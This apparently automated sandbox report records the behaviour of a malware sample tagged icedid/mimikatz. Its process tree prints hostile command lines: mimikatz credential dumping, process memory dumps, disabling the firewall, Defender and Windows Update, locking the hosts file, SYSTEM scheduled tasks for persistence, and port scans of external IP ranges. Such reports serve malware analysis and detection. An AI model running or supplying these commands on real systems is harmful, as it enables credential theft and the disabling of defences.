\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" naustif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" naustif.exe Key created \REGISTRY\USER\.DEFAULT\Software skyttnyln.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump skyttnyln.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump skyttnyln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" skyttnyln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" naustif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" skyttnyln.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing naustif.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump skyttnyln.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump skyttnyln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" skyttnyln.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump skyttnyln.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump skyttnyln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" skyttnyln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" skyttnyln.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump skyttnyln.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals skyttnyln.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump skyttnyln.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump skyttnyln.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing skyttnyln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" naustif.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" skyttnyln.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump skyttnyln.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" skyttnyln.exe -
Modifies registry class 14 IoCs
Processes:
naustif.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ naustif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ naustif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" naustif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" naustif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" naustif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" naustif.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ naustif.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" naustif.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
naustif.exepid process 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe 4448 naustif.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid process 664 664 664 664 664 664 664 664 664 664 664 664 664 664 664 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exepid process 4648 2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exenaustif.exenaustif.exevfshost.exeskyttnyln.exeybtnut.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exeskyttnyln.exedescription pid process Token: SeDebugPrivilege 4648 2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2716 naustif.exe Token: SeDebugPrivilege 4448 naustif.exe Token: SeDebugPrivilege 1088 vfshost.exe Token: SeDebugPrivilege 3684 skyttnyln.exe Token: SeLockMemoryPrivilege 2948 ybtnut.exe Token: SeLockMemoryPrivilege 2948 ybtnut.exe Token: SeDebugPrivilege 4536 skyttnyln.exe Token: SeDebugPrivilege 4452 skyttnyln.exe Token: SeDebugPrivilege 3396 skyttnyln.exe Token: SeDebugPrivilege 2080 skyttnyln.exe Token: SeDebugPrivilege 1140 skyttnyln.exe Token: SeDebugPrivilege 4396 skyttnyln.exe Token: SeDebugPrivilege 2188 skyttnyln.exe Token: SeDebugPrivilege 3276 skyttnyln.exe Token: SeDebugPrivilege 4020 skyttnyln.exe Token: SeDebugPrivilege 3084 skyttnyln.exe Token: SeDebugPrivilege 3088 skyttnyln.exe Token: SeDebugPrivilege 2392 skyttnyln.exe Token: SeDebugPrivilege 3484 skyttnyln.exe Token: SeDebugPrivilege 1704 skyttnyln.exe Token: SeDebugPrivilege 6612 skyttnyln.exe Token: SeDebugPrivilege 5888 skyttnyln.exe Token: SeDebugPrivilege 6944 skyttnyln.exe Token: SeDebugPrivilege 5044 skyttnyln.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exenaustif.exenaustif.exexohudmc.exejobnom.exenaustif.exenaustif.exepid process 4648 2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exe 4648 2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exe 2716 naustif.exe 2716 naustif.exe 4448 naustif.exe 4448 naustif.exe 1188 xohudmc.exe 2892 jobnom.exe 1544 naustif.exe 1544 naustif.exe 3484 naustif.exe 3484 naustif.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.execmd.exenaustif.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid process target process PID 4648 wrote to memory of 4516 4648 2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exe cmd.exe PID 4648 wrote to memory of 4516 4648 2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exe cmd.exe PID 4648 wrote to memory of 4516 4648 2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exe cmd.exe PID 4516 wrote to memory of 4436 4516 cmd.exe PING.EXE PID 4516 wrote to memory of 4436 4516 cmd.exe PING.EXE PID 4516 wrote to memory of 4436 4516 cmd.exe PING.EXE PID 4516 wrote to memory of 2716 4516 cmd.exe naustif.exe PID 4516 wrote to memory of 2716 4516 cmd.exe naustif.exe PID 4516 wrote to memory of 2716 4516 cmd.exe naustif.exe PID 4448 wrote to memory of 2044 4448 naustif.exe cmd.exe PID 4448 wrote to memory of 2044 4448 naustif.exe cmd.exe PID 4448 wrote to memory of 2044 4448 naustif.exe cmd.exe PID 2044 wrote to memory of 1548 2044 cmd.exe cmd.exe PID 2044 wrote to memory of 1548 2044 cmd.exe cmd.exe PID 2044 wrote to memory of 1548 2044 cmd.exe cmd.exe PID 2044 wrote to memory of 3428 2044 cmd.exe cacls.exe PID 2044 wrote to memory of 3428 2044 cmd.exe cacls.exe PID 2044 wrote to memory of 3428 2044 cmd.exe cacls.exe PID 2044 wrote to memory of 3092 2044 cmd.exe cmd.exe PID 2044 wrote to memory of 3092 2044 cmd.exe cmd.exe PID 2044 wrote to memory of 3092 2044 cmd.exe cmd.exe PID 2044 wrote to memory of 3852 2044 cmd.exe cacls.exe PID 2044 wrote to memory of 3852 2044 cmd.exe cacls.exe PID 2044 wrote to memory of 3852 2044 cmd.exe cacls.exe PID 2044 wrote to memory of 1304 2044 cmd.exe cmd.exe PID 2044 wrote to memory of 1304 2044 cmd.exe cmd.exe PID 2044 wrote to memory of 1304 2044 cmd.exe cmd.exe PID 2044 wrote to memory of 3836 2044 cmd.exe cacls.exe PID 2044 wrote to memory of 3836 2044 cmd.exe cacls.exe PID 2044 wrote to memory of 3836 2044 cmd.exe cacls.exe PID 4448 wrote to memory of 2008 4448 naustif.exe netsh.exe PID 4448 wrote to memory of 2008 4448 naustif.exe netsh.exe PID 4448 wrote to memory of 2008 4448 naustif.exe netsh.exe PID 4448 wrote to memory of 2604 4448 naustif.exe netsh.exe PID 4448 wrote to memory of 2604 4448 naustif.exe netsh.exe PID 4448 wrote to memory of 2604 4448 naustif.exe netsh.exe PID 4448 wrote to memory of 4496 4448 naustif.exe netsh.exe PID 4448 wrote to memory of 4496 4448 naustif.exe netsh.exe PID 4448 wrote to memory of 4496 4448 naustif.exe netsh.exe PID 4448 wrote to memory of 3684 4448 naustif.exe cmd.exe PID 4448 wrote to memory of 3684 4448 naustif.exe cmd.exe PID 4448 wrote to memory of 3684 4448 naustif.exe cmd.exe PID 3684 wrote to memory of 2720 3684 cmd.exe wpcap.exe PID 3684 wrote to memory of 2720 3684 cmd.exe wpcap.exe PID 3684 wrote to memory of 2720 3684 cmd.exe wpcap.exe PID 2720 wrote to memory of 2356 2720 wpcap.exe net.exe PID 2720 wrote to memory of 2356 2720 wpcap.exe net.exe PID 2720 wrote to memory of 2356 2720 wpcap.exe net.exe PID 2356 wrote to memory of 1564 2356 net.exe net1.exe PID 2356 wrote to memory of 1564 2356 net.exe net1.exe PID 2356 wrote to memory of 1564 2356 net.exe net1.exe PID 2720 wrote to memory of 4404 2720 wpcap.exe net.exe PID 2720 wrote to memory of 4404 2720 wpcap.exe net.exe PID 2720 wrote to memory of 4404 2720 wpcap.exe net.exe PID 4404 wrote to memory of 2780 4404 net.exe net1.exe PID 4404 wrote to memory of 2780 4404 net.exe net1.exe PID 4404 wrote to memory of 2780 4404 net.exe net1.exe PID 2720 wrote to memory of 3948 2720 wpcap.exe net.exe PID 2720 wrote to memory of 3948 2720 wpcap.exe net.exe PID 2720 wrote to memory of 3948 2720 wpcap.exe net.exe PID 3948 wrote to memory of 5016 3948 net.exe net1.exe PID 3948 wrote to memory of 5016 3948 net.exe net1.exe PID 3948 wrote to memory of 5016 3948 net.exe net1.exe PID 2720 wrote to memory of 4292 2720 wpcap.exe net.exe
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1652
-
C:\Windows\TEMP\vzignttnc\ybtnut.exe"C:\Windows\TEMP\vzignttnc\ybtnut.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2948
-
C:\Users\Admin\AppData\Local\Temp\2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-04-10_74dae0e65f4adbbb80aa9b3df54fc6df_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4648 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\rkilesrw\naustif.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4516 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:4436 -
C:\Windows\rkilesrw\naustif.exeC:\Windows\rkilesrw\naustif.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2716
-
C:\Windows\rkilesrw\naustif.exeC:\Windows\rkilesrw\naustif.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1548
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:3428
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3092
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:3852
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1304
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:3836
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵PID:2008
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:2604
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:4496
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tteyulnen\igasksjja\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:3684 -
C:\Windows\tteyulnen\igasksjja\wpcap.exeC:\Windows\tteyulnen\igasksjja\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:1564
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4404 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:2780
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:3948 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:5016
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:4292
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:3172
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:2856
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3992
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4948
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:4356
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3840
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:1088
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tteyulnen\igasksjja\eblttilyr.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\tteyulnen\igasksjja\Scant.txt2⤵PID:2392
-
C:\Windows\tteyulnen\igasksjja\eblttilyr.exeC:\Windows\tteyulnen\igasksjja\eblttilyr.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\tteyulnen\igasksjja\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1316 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tteyulnen\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\tteyulnen\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:4888 -
C:\Windows\tteyulnen\Corporate\vfshost.exeC:\Windows\tteyulnen\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1088 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tfintytmv" /ru system /tr "cmd /c C:\Windows\ime\naustif.exe"2⤵PID:740
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4584
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tfintytmv" /ru system /tr "cmd /c C:\Windows\ime\naustif.exe"3⤵
- Creates scheduled task(s)
PID:1304 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "anlmrcstj" /ru system /tr "cmd /c echo Y|cacls C:\Windows\rkilesrw\naustif.exe /p everyone:F"2⤵PID:4536
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4436
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "anlmrcstj" /ru system /tr "cmd /c echo Y|cacls C:\Windows\rkilesrw\naustif.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:3468 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "iazatujnv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vzignttnc\ybtnut.exe /p everyone:F"2⤵PID:1844
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:332
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "iazatujnv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vzignttnc\ybtnut.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:4056 -
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵PID:3880
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵PID:1544
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:3084
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:3948
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵PID:4548
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:4052
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:928
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4356
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵PID:4196
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:1956
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:3640
-
C:\Windows\TEMP\tteyulnen\skyttnyln.exeC:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 780 C:\Windows\TEMP\tteyulnen\780.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3684 -
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:3092
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:3844
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1304
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:3992
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:4992
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:3056
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:2420 -
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:3576
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:3960 -
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:4060
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:2876
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:1828
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:4888
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1544
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:2580
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:4288
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:2916
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:2044
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:332
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:3384
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:1472 -
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:3460
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:2120 -
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:4364
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:4244 -
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:4552
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:4092 -
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:1188 -
C:\Windows\TEMP\tteyulnen\skyttnyln.exeC:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 64 C:\Windows\TEMP\tteyulnen\64.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4536 -
C:\Windows\TEMP\tteyulnen\skyttnyln.exeC:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 1652 C:\Windows\TEMP\tteyulnen\1652.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4452 -
C:\Windows\TEMP\tteyulnen\skyttnyln.exeC:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 2512 C:\Windows\TEMP\tteyulnen\2512.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3396 -
C:\Windows\TEMP\tteyulnen\skyttnyln.exeC:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 2616 C:\Windows\TEMP\tteyulnen\2616.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2080 -
C:\Windows\TEMP\tteyulnen\skyttnyln.exeC:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 2752 C:\Windows\TEMP\tteyulnen\2752.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1140 -
C:\Windows\TEMP\tteyulnen\skyttnyln.exeC:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 2848 C:\Windows\TEMP\tteyulnen\2848.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4396 -
C:\Windows\TEMP\tteyulnen\skyttnyln.exeC:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 3700 C:\Windows\TEMP\tteyulnen\3700.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2188 -
C:\Windows\TEMP\tteyulnen\skyttnyln.exeC:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 3796 C:\Windows\TEMP\tteyulnen\3796.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3276 -
C:\Windows\TEMP\tteyulnen\skyttnyln.exeC:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 3924 C:\Windows\TEMP\tteyulnen\3924.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4020 -
C:\Windows\TEMP\tteyulnen\skyttnyln.exeC:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 4004 C:\Windows\TEMP\tteyulnen\4004.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3084 -
C:\Windows\TEMP\tteyulnen\skyttnyln.exeC:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 3416 C:\Windows\TEMP\tteyulnen\3416.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3088 -
C:\Windows\TEMP\tteyulnen\skyttnyln.exeC:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 4940 C:\Windows\TEMP\tteyulnen\4940.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2392 -
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\tteyulnen\igasksjja\scan.bat2⤵PID:3980
-
C:\Windows\tteyulnen\igasksjja\krslbantt.exekrslbantt.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:32 -
C:\Windows\TEMP\tteyulnen\skyttnyln.exeC:\Windows\TEMP\tteyulnen\skyttnyln.exe -accepteula -mp 4460 C:\Windows\TEMP\tteyulnen\4460.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3484 -
